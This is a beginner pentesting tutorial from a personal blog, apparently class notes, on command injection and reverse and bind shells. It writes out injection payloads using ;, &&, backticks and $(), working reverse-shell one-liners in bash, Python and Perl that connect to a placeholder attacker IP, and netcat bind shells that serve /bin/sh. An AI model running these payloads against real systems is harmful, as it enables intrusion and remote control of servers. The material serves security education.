Niklas Heringer - Cybersecurity Blog

Pentesting 101 – Command Injection & Shell Tricks (Session 1 – Part 2)

🧠 Intro: From XSS to Command Injection

In Part 1 from our first uni class, we looked at reflected XSS, a client-side injection vulnerability.

This time, we shift our focus to the server-side world — where insecure input handling can lead to total system compromise.

Command Injection happens when user input is unsafely interpolated into shell commands — and suddenly, the server is doing a lot more than it should.


🧨 What Is Command Injection?

Imagine a web app that runs:

ping -c1 [user_input]

If that input isn’t properly sanitized, you can inject shell characters like ;, &&, or ` to chain new commands.

🧪 Examples:

127.0.0.1; id
127.0.0.1 && whoami
127.0.0.1 | uname -a
127.0.0.1 $(ls)
127.0.0.1 `ls`

💥 Each of these abuses how Linux shells parse input and interpret operators.


🔧 Common Shell Operators (Quick Overview)

Operator What it does
; Run the next command regardless of success
&& Run next only if previous succeeds
`
`cmd` or $(cmd) Run the output of cmd inline
` `
& Run command in background
2>&1 Redirect stderr (2) to stdout (1)

💡 Tip: Use 127.1 instead of 127.0.0.1 — it’s shorter, but resolves to the same localhost address.


🔁 Command Redirection & Piping

A common test payload is:

127.0.0.1; id

But you can chain that with:

127.1; ls -la | grep config
127.1; whoami 2>&1

2>&1 is a classic redirect — it merges error output (stderr) into standard output (stdout), making sure you see everything in one stream.

📖 Learn more:
GeeksForGeeks – Piping in Unix/Linux


🛠️ Command Injection in Practice

You’ll often find these issues in:

On labs like DVWA, it’s often enough to inject something like:

127.0.0.1; uname -a

Try different operators and command lengths — some filters block semicolons, others miss backticks or $().


🧠 Shells, Reverse Shells & Execution Flow

Once you’ve confirmed command execution on a target system (like via command injection), the next step is often trying to escalate that access into a fully interactive shell.

This is where reverse shells and bind shells come in — they let you break out of limited command execution and actually interact with the system like a logged-in user.


🌀 What Is a Reverse Shell?

A reverse shell is when the target system connects back to you, the attacker, and gives you a shell.

This is super common in real-world pentesting because outbound traffic is usually allowed, while inbound traffic (like with bind shells) often gets blocked by firewalls.

🛠 Typical Reverse Shell Flow:

  1. Attacker (you) prepares a listener on your machine:

    nc -nlvp 4444
    
  2. Victim executes a payload like:

    bash -i >& /dev/tcp/your-ip/4444 0>&1
    
  3. 💥 Boom — a shell session opens in your terminal.


🔥 Useful Reverse Shell Variants

If bash isn’t available, try these instead:

🔁 Python:

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("your-ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh"])'

🧪 Perl:

perl -e 'use Socket;$i="your-ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

💡 Other tools:

Need help generating a payload?
✅ Use: RevShells.com


🔗 What Is a Bind Shell?

A bind shell is the opposite: the victim machine opens a port and listens for a connection.
You (the attacker) then connect to that open port and get shell access.

🧱 Example:

Victim runs:

nc -nlvp 4444 -e /bin/sh

Attacker connects:

nc target-ip 4444

⚠️ Problem: Most firewalls block incoming connections — so this is less reliable in real-world networks.


🔄 Reverse Shell vs Bind Shell – Quick Comparison

Feature Reverse Shell Bind Shell
Who connects? Victim connects to attacker Attacker connects to victim
Better for NAT/Firewalls? ✅ Yes ❌ Usually blocked
Stealthier? ✅ Yes (outbound) ❌ No (open listener)
Common in the wild? ✅ Very ⚠️ Rare

💡 In modern networks, reverse shells are almost always preferred — outbound connections look like normal traffic and are far more likely to succeed.


🧠 But Wait… How Do You Know If You Have a Shell?

If the reverse shell worked correctly, you should see something like:

connection received on 192.168.x.x
whoami
www-data

Congrats — you’re inside. But often it’s not a fully interactive shell (e.g. arrow keys don’t work, no clear screen).

That’s where shell stabilization comes in… but we’ll cover that in a future post. 😉


📚 More Resources


😈 This is where things really start to feel like hacking.

(Though let’s be honest — calling it “hacking” still feels like we’re in a 90s movie.)


📡 Quick Netcat Command Recap

Command Purpose
nc -nlvp PORT Listen on a port (Reverse Shell)
nc IP PORT Connect to victim’s port (for Bind Shell)
nc IP PORT -e /bin/sh Send a shell upon connection
`nc -nlvp 4444 tee /tmp/log`

⚠️ Netcat is unencrypted — no TLS, no protection. Use in isolated labs.


🧰 Tools & Extras

RevShell Generator

Great tool for crafting reverse shell payloads in different languages:
https://www.revshells.com

Shell Stabilization (Coming Soon)

Got a raw shell? We’ll talk about python -c 'pty.spawn("/bin/bash")', stty, and more in the next write-up.


🔍 Final Tip: Injection Meets Bandit

I’ll be exploring command execution with OverTheWire: Bandit soon — perfect to sharpen scripting skills and understand shell environments more deeply.

Also: Watch out for client-side limitations like input length, encoding, or blocked characters.
Use Burp Suite’s request interception to bypass and test real input.


💬 Up Next

If you’re new to command injection or unsure when to use ; vs |, you’re not alone — this is where most red team journeys begin 🚀